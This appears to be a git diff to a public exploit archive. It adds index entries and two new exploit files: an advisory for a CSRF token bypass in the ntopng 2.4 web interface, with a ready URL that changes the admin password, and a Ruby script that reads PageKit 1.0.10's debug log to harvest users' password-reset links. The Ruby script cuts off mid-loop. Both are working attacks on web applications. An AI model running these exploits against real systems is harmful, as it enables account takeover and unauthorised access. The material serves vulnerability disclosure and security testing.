diff --git a/files.csv b/files.csv index f76183335..e0070106c 100644 --- a/files.csv +++ b/files.csv @@ -5341,6 +5341,7 @@ id,file,description,date,author,platform,type,port 41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0 41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0 41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0 +41142,platforms/unix/dos/41142.c,"SunOS 5.11 ICMP - Denial of Service",2017-01-22,"Todor Donev",unix,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8758,6 +8759,7 @@ id,file,description,date,author,platform,type,port 41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0 41090,platforms/windows/local/41090.py,"SentryHD 02.01.12e - Privilege Escalation",2017-01-18,"Kacper Szurek",windows,local,0 41130,platforms/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",android,local,0 +41144,platforms/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -37073,3 +37075,5 @@ id,file,description,date,author,platform,type,port 41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0 41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0 41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0 +41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0 +41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0 diff --git a/platforms/linux/webapps/41141.txt b/platforms/linux/webapps/41141.txt new file mode 100755 index 000000000..7b197ca73 --- /dev/null +++ b/platforms/linux/webapps/41141.txt @@ -0,0 +1,111 @@ +[+]##################################################################################### +[+] Credits / Discovery: John Page AKA Hyp3rlinX +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt +[+] ISR: ApparitionSEC +[+]##################################################################################### + + + +Vendor: +============ +www.ntop.org + + +Product: +==================== +ntopng Web Interface +v2.4.160627 + +ntopng is the next generation version of the original ntop, a network +traffic probe that shows the network usage, similar +to what the popular top Unix command does. ntopng is based on libpcap and +it has been written in a portable way in order to +virtually run on every Unix platform, MacOSX and on Windows as well. + + +Vulnerability Type: +================== +CSRF Token Bypass + + + +CVE Reference: +================ +CVE-2017-5473 + + + +Security Issue: +================= +By simply omitting the CSRF token or supplying arbitrary token values will +bypass CSRF protection when making HTTP requests, +to the ntopng web interface. Allowing remote attackers the rights to make +HTTP requests on an authenticated users behalf, if +the user clicks an malicious link or visits an attacker webpage etc. + + +Exploit/POC: +============ + +1) Change admin password +http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED&username=admin&new_password=xyz123&confirm_new_password=xyz123 + + +2) Add arbitrary + +
+ + + +Disclosure Timeline: +===================== +Vendor Notification: January 11, 2017 +Vendor acknowledgement: January 12, 2017 +Vendor Fixed Issue +January 20, 2017 : Public Disclosure + + + +Network Access: +=============== +Remote + + +Impact: +====================== +Information Disclosure +Privilege Escalation + + + +Severity: +=========== +High + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c) HYP3RLINX - +Apparition diff --git a/platforms/php/webapps/41143.rb b/platforms/php/webapps/41143.rb new file mode 100755 index 000000000..24965c686 --- /dev/null +++ b/platforms/php/webapps/41143.rb @@ -0,0 +1,107 @@ +# Exploit Title: Remote PageKit Password Reset Vulnerability +# Date:21-01-2017 +# Software Link: http://pagekit.com/ +# Exploit Author: Saurabh Banawar from SecureLayer7 + +# Contact: http://twitter.com/securelayer7 +# Website: https://securelayer7.net +# Category: webapps + +1. Description + +Anyremote user can reset the password by reading the debug log, the exploit +can be successfully executed, if the debug option is enabled in the Pagekit +CMS. + +CMS Pentest report can be found here:https://securelayer7.net/ +download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf + + +2. Proof of Concept + +require 'net/http' + +#Enter the domain/IP address of the site for which you want to test this vulnerability +vulnerableSite = 'http://127.0.0.1' + +loopCount = 0 +while loopCount == 0 + + +#We request the Login page which has the debug parameter +url = URI.parse(vulnerableSite + '/pagekit/index.php/user/login') +request = Net::HTTP::Get.new(url.to_s) +resp = Net::HTTP.start(url.host, url.port) {|http| +http.request(request) +} + +#The response is received and is sent to many regular expression to find the value of _debug parameter from its HTML source code +bodyOfResponse = resp.body +myArray1 = bodyOfResponse.split(/"current":"/) +outputOfMyArray1 = myArray1[1] +myArray2 = outputOfMyArray1.split(/"};/) +theSecret = myArray2[0] +puts "" +puts "The secret token to debug link is: #{theSecret}" +puts "" +url = URI.parse(vulnerableSite + '/pagekit/index.php/_debugbar/' + theSecret) +request = Net::HTTP::Get.new(url.to_s) +resp = Net::HTTP.start(url.host, url.port) {|http| +http.request(request) +} + +resp.body + +initial = resp.body + +#The count of number of victim users is found out + users = initial.scan(/user=.+?(?=")/) + c = users.count + e = c.to_i + +#If the count is 0 then we continuosly monitor it + if c == 0 then puts "Currently no user has clicked on reset password like." + + puts "" + puts "Trying again..." + puts "" + puts "" + +#If the count is greater than 0 then it means we found a victim. So, find the password reset link and display it in the console + else + + link1 = vulnerableSite + "/pagekit/index.php/user/resetpassword/confirm?user=" + link2 = "&key=" + i = 0 + while i